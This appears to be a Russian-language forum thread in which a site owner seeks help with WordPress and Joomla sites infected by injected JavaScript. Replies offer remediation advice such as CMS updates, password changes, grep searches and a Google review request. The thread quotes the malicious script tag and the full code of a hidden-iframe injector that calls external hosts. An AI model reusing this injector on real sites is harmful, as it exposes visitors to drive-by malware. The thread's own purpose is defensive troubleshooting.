Ссылка на зараженный сайт http://www.baragbonta.ru У меня на компьютере стоит антивирус NOD Smart Security c последними обновлениями, который обнаруживает этот вредоносный джава скрипт: Имя объекта: http://yqwogdk.dnsdojo.net/rsize.js Размер: 406 Причина: JS/IFrame.HF троянская программа Посмотрел через браузер исходный код сайта, вконце, после </html> вставляется ссылка на вирус: Код (Text): </body> </html><script src="http://yqwogdk.dnsdojo.net/rsize.js"></script> Зашел по FTP в исходный код, а там этой вредоносной ссылки нету Как избавиться от вируса, помогите, пожалуйста.
Это нужно разбираться на месте с полным доступом к сайту. Даже если вы где-нибудь в шаблоне удалите запись, она появится снова. Нужно искать слабое место, смотреть время изменения файлов, логи. Это может быть форма обратной связи или слишком простой пароль к админке, или уязвимость к sql инъекциям. Также сам сервер может быть заражен.
Сайт вылечил установив обновления ядра WordPress. Но на хостинге было 2 сайта, и второй сайт точно также заражен koorsovetrso.ru, там обновить ядро Джумлы я не могу, так как модули перестают ладить друг с другом. Модуль обратной связи был, только не был нигде выставлен, сейчас я этот модуль удалил, но вирус все еще остался. Вот код скрипта-вируса: Код (Text): res='wgcxyok.mypets.ws'; var astatf = 0; document.write("<head></head><b><div id='accountidsl'></div></b>"); document.onmousemove=jsstatic; function jsstatic() { if (astatf == 0) { astatf++; text = "<iframe src='http://"+res+"/statkcik/2' width='6' height='10' style='position: absolute; left: -1000px; top: -1000px; z-index: 1;'></iframe>"; document.getElementById("accountidsl").innerHTML = text }}
Чтобы почистить можете творчески переработать вот это: http://habrahabr.ru/post/145115/ Но конечно надо узнать как он вообще проник на сервер. Возможно вирус прочитал пароль в вашем ftp-клиенте. Смените пароли, в клиенте пароль не сохраняйте, вводите по памяти или через буфер обмена копируйте из тайного места.
footer.php у вас есть? Добавлено спустя 55 секунд: просто в php может содержаться как басе_кодер("sdgdsgsdfgsfdgeasfwefqwqadfwdfwefdqa");
Скрипты посмотрел, вроде все чистые были футер тоже чист был Все таки получилось обновить ядро Joomla без последствий и вирус исчез, проблема решена, спасибо за советы!
Вроде? Значит скрипты были не чистые, разве неочевидно? Зловред мог пользоваться элементарным приемом: перед вредоносным кодом отбивается 100500 пробелов чтобы в текстовом редакторе код оказался за пределами видимости. Поэтому искать надо не глазами, а программно: grep, find или еще какой прогой. Если вы не нашли "дыру" и не меняли пароли, то он снова появится, будте уверены.
есть такой файл для поиска подозрительных включений кода http://www.revisium.com/ai/, Посмотри, мне помогал несколько раз
поддерживаю Добавлено спустя 10 минут 30 секунд: вы сайт сами писали с нуля? либо скрипты с инета тащили? =)
Спасибо, попробую разобраться Все с инета тащил, 1 сайт на Joomla, 2-й сайт на WP + расширения всякие, исходный код тоже редактировал. Кстати, хром закрывает доступ к сайту, пишет, что уже здоровый сайт http://baragbonta.ru/, содержит вредоносное ПО, что с этим делать? Все остальные браузеры открывают нормально
Внимание! Обнаружена проблема! Веб-сайт содержит элементы с сайтов, на которых, судя по всему, размещено вредоносное ПО – программы, которые могут нанести вред вашему компьютеру или выполнять действия без вашего согласия. Даже простое посещение сайта, на котором размещено вредоносное ПО, может привести к заражению вашего компьютера. Представляющие опасность элементы с этой страницы приведены ниже. Чтобы получить более подробную информацию о каждом элементе, нажмите на ссылку "Диагностика". Вредоносное ПО http://baragbonta.ru/wp-content/uploads/banners/kvaisa.jpg Страница диагностики безопасного просмотра Вредоносное ПО http://baragbonta.ru/wp-content/uploads/banners/ironau.gif Страница диагностики безопасного просмотра Вредоносное ПО http://baragbonta.ru/wp-content/uploads/banners/uasamonga.jpg Страница диагностики безопасного просмотра Вредоносное ПО http://baragbonta.ru/wp-content/uploads/banners/abetae.ru.jpg Страница диагностики безопасного просмотра Вредоносное ПО http://baragbonta.ru/wp-content/uploads/2010/08/ludvig-tsibirti.jpg Страница диагностики безопасного просмотра Подробнее о том, как защититься от вредоносного ПО, распространяемого в Интернете. Я осознаю, что посещение этого сайта может нанести
Кажется разобрался. Чтобы убрать это предупреждение, нужно добавить сайт в Гугл.Вебмастерс и запросить рассмотрение сайта. Убедившись, что вредоносный код полностью удален, вы можете запросить проверку своего сайта средствами Google. Если вредоносное ПО не обнаружится с вашего сайта будет снят ярлык предупреждения на странице результатов поиска. На главной странице Инструментов для веб-мастеров выберите нужный сайт. Выберите Состояние, а затем Вредоносные программы. Нажмите Запросить пересмотр.